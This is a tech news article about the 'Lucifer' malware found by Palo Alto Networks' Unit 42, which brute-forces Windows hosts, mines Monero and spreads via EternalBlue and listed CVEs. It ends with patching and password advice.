Skip to main content

'Lucifer' malware targets Windows machines using NSA exploits: Protect yourself now

windows running on a laptop
(Image credit: Wachiwit / Shutterstock.com)

Security researchers have found a new malware strain that hijacks vulnerable Windows devices to mine cryptocurrency and stage devastating DDoS attacks, leading the researchers to prompt PC users and server administrators to ensure that they are being protected by the best antivirus software.

The malware, called "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks'  Unit 42, "brute forces" its way into Windows machines by trying out common usernames and passwords on widely used system ports.

The malware primarily targets enterprise servers, especially since those servers can provide entry into corporate networks, but can also infect personal computers.

Unit 42 came across the malware after investigating the CVE-2019-9081 exploit, a vulnerability in the open-source web-application-development Laravel Framework that enables perpetrators to conduct remote-code-execution attacks. 

“A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and [is] well-equipped with all kinds of exploits against vulnerable Windows hosts,” wrote the Unit 42 researchers in a blog post

(Lucifer's own creators call the malware "Satan DDoS," but Unit 42 thought that might cause confusion as there's already "Satan" ransomware.)

“The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc.”

Powerful malware threat

The researchers described Lucifer as “quite powerful in its capabilities.” Once it has infected a system, it lets the perpetrators mine the Monero cryptocurrency and to spread to other machines on the local network using the EternalBlue, EternalRomance and and DoublePulsar exploits that were stolen from the U.S. National Security Agency some years ago.

According to the researchers, hackers are “weaponising” a range of security vulnerabilities using the Lucifer malware. 

Identified by Common Vulnerabilities and Exposures (CVE) ID numbers, these include CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464. 

“These vulnerabilities have either high or critical ratings due to their trivial-to-exploit nature and their tremendous impact inflicted on the victim,” explained the researchers.

“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation.”

Certutil.exe is a Microsoft utility that manages the digital certificates necessary to conduct secure internet communications and transactions.

How to avoid the Lucifer malware

Although these vulnerabilities are certainly worrying, the researchers noted how patches are “readily available” and urged organisations to keep their systems updated to mitigate attacks. 

The researchers added: “While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance.”

To make sure your Windows system, whether it's a laptop or a web server, isn't hit by the Lucifer malware, make sure it's fully patched with the latest Windows security updates, and that the system-administrator username and password are strong and unique. 

Of course, it helps to be running some of the best antivirus software, most of which will recognize and block Lucifer and its various components right away.